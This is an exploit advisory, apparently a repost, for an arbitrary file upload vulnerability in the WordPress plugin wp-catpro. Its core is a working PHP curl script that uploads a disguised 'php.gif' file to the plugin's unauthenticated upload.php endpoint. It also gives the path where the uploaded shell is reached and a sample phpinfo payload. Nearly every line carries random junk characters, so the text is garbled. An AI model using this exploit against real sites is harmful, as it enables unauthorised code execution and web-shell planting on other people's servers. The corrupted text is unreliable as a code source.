Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability# Q7 x; e6 @; ]( L6 f
#-----------------------------------------------------------------------
f3 t" k+ V9 d; I' g
& n9 m1 E J2 _- M- @! Z作者 => Zikou-16
, u4 i6 X& ~% m0 y邮箱 => zikou16x@gmail.com* I+ L" P/ d- c% A+ f- K4 ^
测试系统 : Windows 7 , Backtrack 5r3
& J( U" s* d5 c1 g! ^# s下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
: ~7 c0 ^; j8 B, z0 G" D####( x6 c0 f9 N: t
; V* c. l+ @* K& E, u+ D#=> Exploit 信息:
1 M2 H) `+ g X0 r( p------------------: Q$ e/ A7 y- x @3 [6 M
# 攻击者可以上传 file/shell.php.gif8 N9 z3 }. Q' G+ h
# ("jpg", "gif", "png") // Allowed file extensions
( m2 ~7 L# K9 Q! f. Q0 T' F' a# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
( z; s( R! m1 L0 v' L2 _# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)3 ]8 [' Y% D. P: ?* p5 _7 j9 `
------------------
7 R# {' I; n" |* `4 M1 _) y
$ U& j- r8 m7 z3 I9 j( T& \, g#=> Exploit
$ L& T1 h+ d- I+ M-----------& b9 W9 P" S# A. Y7 p7 r9 l
<?php
: {# c1 x( o$ k, @6 I' p+ K+ w , ~- x- l! g. r
$uploadfile="zik.php.gif";
, P# s3 o: F8 }/ |: f7 `" r0 H% S$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
- |6 T9 [+ P2 {3 Y; ecurl_setopt($ch, CURLOPT_POST, true);4 w3 j, t" J/ A9 I1 K
curl_setopt($ch, CURLOPT_POSTFIELDS,) p2 g* s; N$ a; Y* p) ^2 y
array('Filedata'=>"@$uploadfile",: o) a$ l" a9 B0 ~2 a
'folder'=>'/wp-content/uploads/catpro/'));
6 a% L. J' P9 f3 Q9 l* Xcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);5 a+ I# |. w/ f# }3 S2 L4 A
$postResult = curl_exec($ch);
% A% r& w& h* d& V% l# ~! zcurl_close($ch);
, k3 W& L+ L2 x+ X! Q 8 q# i: r }2 b2 c. u i1 m
print "$postResult";
8 M3 ?, s$ t$ R0 R; D. f
6 a1 G! a/ ? pShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
8 o, \, t4 p6 a- x/ Z ?>0 o, o' g ~7 l
<?php
! L( W( y+ c3 Dphpinfo();
) \' P: y0 r. O?> |